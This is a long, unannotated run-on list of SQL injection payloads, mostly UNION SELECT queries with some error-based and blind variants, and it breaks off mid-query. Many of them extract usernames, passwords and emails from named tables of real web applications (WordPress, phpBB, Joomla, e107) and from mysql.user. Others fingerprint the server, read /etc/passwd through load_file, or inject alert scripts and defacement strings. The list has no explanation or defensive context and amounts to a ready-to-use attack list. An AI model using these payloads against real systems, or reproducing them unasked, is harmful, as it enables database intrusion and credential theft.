1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,email,password,login),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88 from pravmamba_users limit 0,1 9999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),database(),user()),16,17,18,19,20-- 9999 union select 1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pwd),12,13,14,15,16,17,18,19,20 from lnkxchange_admins/* 9999 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,password,email,name),11,12 from user/* 9999 union select 1,2,3,4,5,6,7,8,version(),10,11 from news-- 9999 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13,14,15,16,17,18,19,20 9999 union select 1,2,3,4,5,6,7 from admin/* -9999 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database (), user()),8,9,10,11,12,13,14,15,16,17,18/* 9999 union select 1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7/* 9999 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()) -- 9999 union select 1,2,3,4,5,concat_ws(0x3a,username,upass,uemail),7 from users/* 9999 union select 1,2,3,4,5,concat_ws(char(32,58,32),user(),database(),version()),7,8,9,10/* 9999 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 9999 union select 1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71)/* 9999' union select 1,2,3,4,concat(id,':',login,':',pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from user-- 9999 union select 1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16/* -9999 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14/* -9999 union Select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15/* 9999 union select 1,2,3,4,concat_ws(0x40,id,username,password) from users limit 0,1-- 9999 union select 1,2,3,4,version(),6,7,8-- 9999 union select 1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 9999 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 9999 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7 -9999 union select 1,2,3,concat_ws(0x203a3a3a20,version(),user(),database()),5,6,7,8,9,10,11,12/* 9999 union select 1,2,3,concat_ws(0x2F,user,password),5,6,7 from mysql.user/* -9999 union select 1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10/* -9999 union select 1,2,3,USER(),VERSION(),6,7,8,9,10,11,12/* 9999 union select 1,2,3,version()-- 9999 union select 1,2,3,version(),5,6-- 9999' union select 1,2,concat(convert(name using latin1),0x3a,convert(password using latin1)),concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from jos_users -- 9999 union select 1,2,concat(user,0x3a,pass) from users limit 0,1/* -9999 union select 1,2,concat(user(),0x3a,version()),4 9999 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -9999 union select 1,2,concat_ws(0x20,version(), 9999 union select 1,2,concat_ws(0x3a,admin_login,admin_password),4,5,6,7 from koleso_ktopof.admins/* -9999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4/* -9999 union select 1,2,concat_ws(0x3a, version(), user(), database()),4,5,6,7,8,9,10,11,12/* 9999 union select 1,2,database()/* 9999 union select 1,2,group_concat(column_name separator 0x0a) from information_schema.columns where table_name=0x636f7374 -- 9999 union select 1,2,login,4,email,6,7,8,psw from users limit 558 , 1/* -9999 union select 1,2,password from users/* 9999 union select 1,2,TABLE_NAME,4,5,6,7,8,9,0,1,2,3,4,5,6 from INFORMATION_SCHEMA.TABLES-- 9999 union select 1,2,USER(),4,5,VERSION(),7,8,9,DATABASE(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* 9999 union select 1,2,username,userpass from poll_user/* 999.9' union select 1,2,version(),4,5,6 -- 9999 union select 1,2,version(),4,5,6,7,8/* 9999 union select 1,concat(user(),0x3a,database()),3,4,5,6/* 9999 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* 9999 union select 1,concat(USER(),DATABASE()),3,4,5,6,7/* -9999 union select 1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7,8/* 9999 union select 1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 9999 unioN select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7/* -9999 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4/* -9999 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/* 9999 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7/* -999.9 UNION SELECT 1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 9999 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables limit 18,1-- 9999 union select 1,TABLE_NAME,3,4,5,6,7,8 from INFORMATION_SCHEMA.TABLES/* 9999 union select 1,table_name,3,4,5,6 from information_schema.tables limit 17,1-- 9999 union select 1,unhex(hex(concat_ws(0xb,admin_email,admin_password))),3,4,5,6 from tbl_admin_user limit 0,1-- 9999 union select 1,@@version,3,4 /* 9999 union select 1,version(),3,4,concat(login,char(58),password),6,7 from users/* -9999 UNION SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users-- 9999' Union sElecT concat_ws(0x2a3a2a,'">

',version(),database(),user(),@@version_compile_os)-- -9999 UNION SELECT concat_ws(char(58),user_name,user_password) from e107_user where user_id=1-- -9999 UNION SELECT concat_ws(char(58),user_name,user_password)KHG from e107_user where user_id=1-- 9999 union select convert(version(),char) from users/* 9999 union select database(),version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16-- 9999 union select mysql.user.user,mysql.user.password,2,3,4,5 from mysql.user/* -9999 union select null,null,null,concat_ws(0x2A,login,pwd_hash,email),null,null,null FROM u15364.ra_users/* 9999 union select null,null,null,null,null,null,null,null,9,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),11,12,13,14,15 -- 9999 union select null,null,null,table_name,null,null FROM INFORMATION_SCHEMA.TABLES-- -9999' union select table_name,column_name from information_schema.columns limit 264,1/* -9999 UNION SELECT user(),2,version()/* 999' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))-- 999 UNION ALL SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version()),10,11-- -999 union all select 1,unhex(hex(concat_ws(0x203a20,user(),version()))),3-- 999 union all select concat_ws(0x2f,version(),user(),database()) 999 UNION ALL SELECT null,null,null,null,null,null,null,null,null,CONCAT(0x3C7363726970743E616C6572742827,Version(),0x3a,user(),0x27293C2F7363726970743E),null,null,null,null -- 999 union select 0,1,table_name,user(),4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,21,22,23,24,25,26,27,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from INFORMATION_SCHEMA.TABLES/* 999 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,version(),71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,343,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419-- 999' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,version(),69,70-- -999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(name,0x3a,pwd),20,21,22 from maika_users/* 999 union select 1,2,3,4,5,6,7,8,9,10,11,concat(column_name,0x3a,table_name,0x3a),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from INFORMATION_SCHEMA.COLUMNS limit 1,1/*/* 999 union select 1,2,3,4,5,6,7,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host),13,14,15,16,17,18,19,20,21,22,23 from mysql.user/* 999 union select 1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database()),12,13,14,15,16,17,18/* -999 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),user(),database()),11,12,13 999 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,id,email,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23 from users 999') union select 1,2,3,4,5,6,7,8,user(),version(),database(),12,13,14,15,16,17,18,19,20,21/* 999 UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* -999 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18 999 union select 1,2,3,4,5,6,unhex(hex(concat_ws(0x3,user(),database(),version()))),8/* 999 union select 1,2,3,4,5,concat_ws(0x3a,database(),user(),version()),7/* -999 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7,8,9,10,11,12,13-- 999 union select 1,2,3,4,concat_ws(0x3a,database(),user(),version()),6,7,8,9,10,11,12,13,14/* 999 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables limit 17,1-- 999 union select 1,2,3,4,user(),6,7,database(),9,10,11,version(),13,current_date(),15,16,17,18,19,20,21,22,23/* 999 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 999 UNION SELECT 1,2,3,CHAR(104,97,99,107,51,100),5,CHAR(104,97,99,107,51,100),7,8/* 999 union select 1,2,3,concat_ws(0x2F,user,pass,mail),5,6,7,8,9,10,11 from usuarios/* 999 union select 1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin/* 999 UNION SELECT 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6 -- -999 UNION SELECT 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17 -- 999 union select 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -9_99 union select 1,2,3,version(),5,6,user(),8,database(),10,11,12 -999 union select 1,2,concat(version(),char(58,58),database(),char(58,58),user()),4,5/* 999 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/* -999 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6 from amx_webadmins 999 union select 1,2,concat_ws(char(58,58),id,pass,username) from pb_users where id=1/* -999 union select 1,2,user(),version(),5,6,7,8,9/* 999 union select 1,concat(id,0x3a,name,0x3a,usr,0x3a,passwd) from users limit 0,1/* 999 union select 1,concat(user,char(58),password,char(58),File_priv,char(58),host) from mysql.user -999' UNION SELECT 1,concat(username,0x3a,password),3,4 from users limit 0,1/* 999 union select 1,CONCAT(username,CHAR(32,58,32),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from auth/* -999 union select 1,concat(version(),0x3a,user(),0x3a,database())-- -999' union select 1,concat(version(),0x3a,user()),3,4,5,6,7,8,9,0/* -999 union select 1,concat(version(),0x3b,database(),0x3b,user()),3,4,5,6,7,8-- 999 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9/* 999 union select 1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9 from users-- -999 union select 1,concat_ws(0x3a,user(),database(),version()),3,4 -999 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4,5 -- 999 union select 1,concat_ws(0x3a,user(),version(),database()),table_name,4 from information_schema.tables/* 999 union select 1,concat_ws(0x3a,version(),database(),user()),3,concat_ws(0x3a,name,email,login,password,idstatus,info1,info2,info3) from a_user limit 2,1-- 999 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8-- -999 union select 1,concat_ws(char(32,45,32), version(),user(),database()),3,4-- 999 union select 1,login,3,user_password,5,6,7 from user/* 999 union select 1,password,3,4,5,6,7 from user/* -999 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables limit 1,1/* 999 union select 1,user(),version(),4,5,6 -999' union select 1,version(),user(),4/* 999 union select concat(0x3b,table_name,table_schema),2,3,4 from information_schema.tables/* 999 union select concat(0x626C61626C61,0x3,version(),user(),database())/* 999 union select concat(user(),char(58),database(),char(58),version())/* 999 union select concat(username,0x3a,psswd,version()) from users 999 /*!union*/ select /*!concat_ws(0x0b,version(),user(),database(),@@version_compile_os)*/-- 999' union select concat_ws(0x3a,database(),user(),version()),2,3,4,5,6,7/* 999 union select concat_ws(0x3a,password,username,login),2,3 from contest.admins limit 2,1-- 999' union select concat_ws(0x3a,table_name,table_schema) from information_schema.columns where column_name like 0x70617373776f7264-- 999 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/* -999' union select concat_ws(':',user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,'2 -999 union SELECT GROUP_CONCAT(table_name) FROM information_schema.tables-- 999 union select load_file('/lala'),2,3,4 from information_schema.tables/* -999 union select null-- 999' union select null/* 999 union select null,null,null,null,null,uid from users where uid=2/* -999 union select version(),2,3-- 99 and 1=0 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 99' and 1=2 union select 1,2,3,4,group_concat(concat_ws(0x3a,username,password)),6,7,8,9,10,11,12,131,14 from users -- 99 and 1=if((select substring(version(),1,1)<=5),1,(select 1 union select 2)) 99' and 1=(select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))-- 9.9 union all select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6 -- -99 union all select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7-- -99 union select 1,0x6869206d616e20212121,3,4,5,6 from mysql.user/* -99 union select 1,2,0x707265766564203a44,4,5,6,7,8,9,10,11/* -99 union select 1,2,3,0x707265766564,5,6,7,8,9,10,11,12,13,14/* -99' union select 1,2,3,4,5,6,7,8,9,10,11,12/* -99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat(user,0x3a,password),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 from mysql.user limit 1,1/* -99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(uname,0x3a,pass),21 from cinema_user limit 0,1/* -99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,user()/* -99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23-- -99 union select 1,2,3,4,5,6,7,8,9,10,11 from admin-- -99 union select 1,2,3,4,5,6,7,8,9,user(),11/* -99 union select 1,2,3,4,5,6,7,8 from mysql.user/* -99' union select 1,2,3,4,5,6,7,8,version(),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97/* -99) union select 1,2,3,4,5,6,7,8,version(),10,11,12,13/* -99 union select 1,2,3,4,5,6,7,concat(login,0x3a,password),9,10 from user limit 0,1/* -99 union select 1,2,3,4,5,6,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,112,114,101,118,101,100,39,41,60,47,115,99,114,105,112,116,62),8/* -99 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from user/* -99 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables group by table_schema limit 0,1 -- 99 union select 1,2,3,4,5,id,7,8 from user/* -99' union select 1,2,3,4,5,table_name,7,8,9,10,11,12 from information_schema.tables limit 1,1/* -99' union select 1,2,3,4,concat(login,0x3a,password) from users limit 1,1/* -99 union select 1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10 from users limit 1,1/* -99 union select 1,2,3,4,Convert(database() using cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,21,22,23,24/* -99 union select 1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from information_schema.columns where table_name=0x6D656D627265 -- -99' union select 1,2,3,4,'hmm',6,7,8,9,10,11,12/* -99 union select 1,2,3,4,pwd,aid,7,8,9,10,11,12,13,14 from nuke_authors limit 1,1/* -99 union select 1,2,3,concat(uid,0x3a,uname,0x3a,pass),5 from kosnet_users/* -99 union select 1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17 from phpbb_users limit 1,1/* -99 union select 1,2,3,concat(user(),'O_o','preved'),5,6,7,8,9,10/* -99 union select 1,2,3,concat_ws(0x3a3a,t_id,t_nombre,t_dependencia,t_direccion,t_telcasa,t_movil,t_correo,n_activo) from asociado limit 2,1 -- 99 union select 1,2,3,concat_ws(0x3a,user(),database(),version(),login,password),5,6 from sadmin-- 99 union select 1,2,3,log,5,pas,7,8 from user/* -99 union select 1,2,3,password,username,6,7,8,9,10,11,12,13,14,15,16,17 from access -99 union select 1,2,3,'preved:D',5,6,7/* -99 union select 1,2,3,user,password,6 from mysql.user/* -99 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database())-- -99 union select 1,2,concat(admin_name,0x3a,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin/* -99' union select 1,2,concat(convert(user using cp1251),0x3a,convert(password using cp1251)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user limit 0,1/* 99' union select 1,2,concat(fname,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from personnel limit 2,1/* -99' union select 1,2,concat(login,0x3a,password),4 from users/* -99 union select 1,2,concat(username,0x3a,password),4 from users limit 0,1/* -99 union select 1,2,concat(username,0x3a,user_password),4,5,6,7,8 from phpbb_users limit 1,1/* -99 union select 1,2,concat_ws(0x3a,version(),user(),database()),4-- -99 union select 1,2,concat_ws(0x3a,version(),user(),database))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* -99 UNION SELECT 1,2,CONCAT_WS(CHAR(59),user_id,user_name,user_real_name,user_password,user_newpassword,user_email),4,5,6 from user/* -99 UNION SELECT 1,2,login,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM admin-- -99 union select 1,2,login,4,5,6,7,8 ,9,password,11 from user limit 1,1/* -99" union select 1,2,user,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,password,39,40,41,42,43,44,45,46,47 from mysql.user/* -99 union select 1,2,user,4,5,6,7,8,9 from mysql.user-- -99 union select 1,2,version(),4,5,6,7,8,9-- -99 union select 1,2,version(),user(),5,6,7/* -99' union select 1,aes_decrypt(aes_encrypt(database(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/* 99 union select 1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x6f617a69735f7573657273 LIMIT 1,3 -- -99 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a)-- -99 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3-- -99 union select 1,concat(convert(login using cp1251),0x3a,convert(password using cp1251)),3,4,5,6,7,8 from clients/* -99 union select 1,concat(login,0x3a3a,pwd),3 from users-- -99 union select 1,concat(login,0x3a,pwd),3 from users limit 0,1/* -99 union select 1,concat(login,char(58),passwd,char(58),email) from ds_users/* 99 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 limit 1,1 99' union select 1,concat_ws(':',id,login,password,access),3,4,5,6,7,8,9,10,11 from users-- -99 union select 1,convert(user using cp1251),convert(password using cp1251),4,5,6,7,8,9,10,11,12,13 from mysql.user/* -99 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,0,1,2,3/* -99 union select 1,fullname,pwd,4,5,6,7,8,9,10,11,12,13 from admin/* -99 union select 1,id,3,4,5,6,7,8,9,0,1,2,3 from users/* -99 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables-- -99' union select 1,table_name,3,4,convert('asd' using utf8),6,7,8,9 from INFORMATION_SCHEMA.TABLES/* -99 union select 1,user(),3,4,5,6,7,8/* 99' union select 1,user(),3,4,5,6,version(),8,9/* -99 union select 1,username,3,4,5,6,7,8,9 from phpbb_users/* -99 union select 1,user,password,4 from mysql.user/* 99 union select 1,version(),3,4,5,6,7,8,9,10/* -99 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14/* 99 union select 5,16,17,18,user(1)/* -99 union select AES_DECRYPT(aes_encrypt(user(),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13/* -99 union select concat(login,0x3a,pwd) from user limit 0,1/* -99 union select concat(user,0x3a,password),2,3,4,5,6,7,8 from mysql.user limit 45/* -99 UNION SELECT concat_Ws(0x0b,user(),database(),version()) -- -99 union select convert(concat(user,0x3a,password)using cp1251),2 from mysql.user/* -99 union select convert(concat(user,0x3a,password) using cp1251) from mysql.user/* -99 UNION SELECT name,2 from master..sysdatabases-- -99 union select table_name,2,3,4,5 from INFORMATION_SCHEMA.TABLES limit 16,1/* -99 union select user(),2,3,4,5,6,7,8,9,10,11/* -99 union select version() 99 union select version(),2,3,4,5,6,7,8-- 9 and 0 UnIon selECt version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 -- 9 and 1=0 Union Select 1,0x4861636B656420627920494E432E-- 9 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from customer 9 aNd 1=0 UNION SELECT 1,2,3,4,version(),6 -- 9' aNd 1=0 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18 -- 9 and 1=0 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),5,6,7,8,9-- 9 and 1=0 union select 1,concat_ws(0x3a,name,password,fullname,mail),3,4,5,6 from users limit 0,1 -- 9 and 1=0 union select 1,concat_ws(0x3a,ner_name,ner_pass) from ner_admin -- 9 and 1=0 union select 1,concat_ws(0x3a,user(),version()),3,4,5,6-- 9 and 1=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- 9 and 1=0 union select concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10-- 9 and 1=0 union select version() -- -9 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),12 -- 9 and 1=2 union select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12 from information_schema.columns where table_name=0x7573657273 -- 9 and 1=2 union select 1,2,table_name,4 from information_schema.tables limit 25,1/* 9 and mid(version(),1,1)=3 9' and (select 1 from (select count(0),concat((select version() from debates limit 1),floor(rand(0)*2)) from debates group by 2 limit 1)a) and '123'='123 9 and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2)) from information_schema.tables group by 2)x)-- 9) and substring(version(),1,1)=5/* 9DC3ABAF4E4C49DF99A6913572D9A323' OR 1=(select @@version)-- 9 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os,0x3a3a),rand(0)|0) having min(0)-- 9 or 1 group by concat(left(concat_ws(0x3a,user(),database(),version()),64),rand(0)|0) having avg(0) 9 or 1=(select top 1 cast(id as nvarchar) ':' cast(firstName as nvarchar) ':' cast(password as nvarchar) from tblLogin)-- 9 union all select 1,concat_ws(version(),user(),database()),3,4,5,6,7,8-- -9 UnIoN all select concat_ws(0x3a,@@version,user(),database()),2 -9' union select 1,2,3,4,5,6 -- -9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,login,pass),34,35 from u57027_2.osnova/* 9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18 -- -9 union select 1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15 from information_schema.columns where table_name=0x6d6f64466565646261636b55736572-- -9 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10-- -9 union select 1,2,3,4,5,6,7,8 union select 1,2,3,4,5,6,7,8 -- -9 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,UserPass,UserName,UserEmail),9 from CMSUsers limit 0,1 -- -9 union select 1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9 from users/* -9 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11/* -9 union select 1,2,3,4,5,6,concat(user_name,char(58),password),8 from users/* 9 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16/* -9 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9/* 9 union select 1,2,3,4,5,concat(0x2,version(),user(),database()),7,8,9,10,11 9 union select 1,2,3,4,5,concat_ws(0x3a3a,usuario,clave,Nombre,email),7,8,9 from usuarios limit 1,1 -- -9 UNION SeLeCt 1,2,3,4,5,concat_ws(0x3a3a,version(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -9 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version())-- -9 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from maybach_users/* -9' union select 1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8/* -9 union select 1,2,3,4,concat_ws(0x2a2a2a,user,password),6,concat_ws(0x2a2a2a,version(),user(),database()),8 from mysql.user limit 1,1-- -9 union select 1,2,3,4,concat_ws(0x3a,user(),version(),@@version_compile_os)-- 9 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8 limit 1,1/* 9 UNION SELECT 1,2,3,4,concat_ws(0x3,password),6,7,8,9,10,11 from grandliteadmin-- -9 union select 1,2,3,4,convert(concat(username,char(58),pword) using latin1),6,7,8,9 from users -9 union select 1,2,3,4,group_concat(0x0b,column_name),6 from information_schema.columns where table_name=0x70687062625f666f72756d7573657273-- -9 union select 1,2,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18 from user -- -9 union select 1,2,3,4,user_name,6,7,8,9,user_password,11,12,13 from users -- -9 union select 1,2,3,concat(0x3,hash),5 from adminsessions-- -9 union select 1,2,3,concat(char(58,58,58),concat_ws(char(58),user_login,user_pass,user_email),char(58,58,58)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from evo_users/* -9 union select 1,2,3,concat(database(),version(),user()),5,6,7,8,9,10-- 9 union select 1,2,3,concat(table_name,0x3a,column_name),5,6,7 from 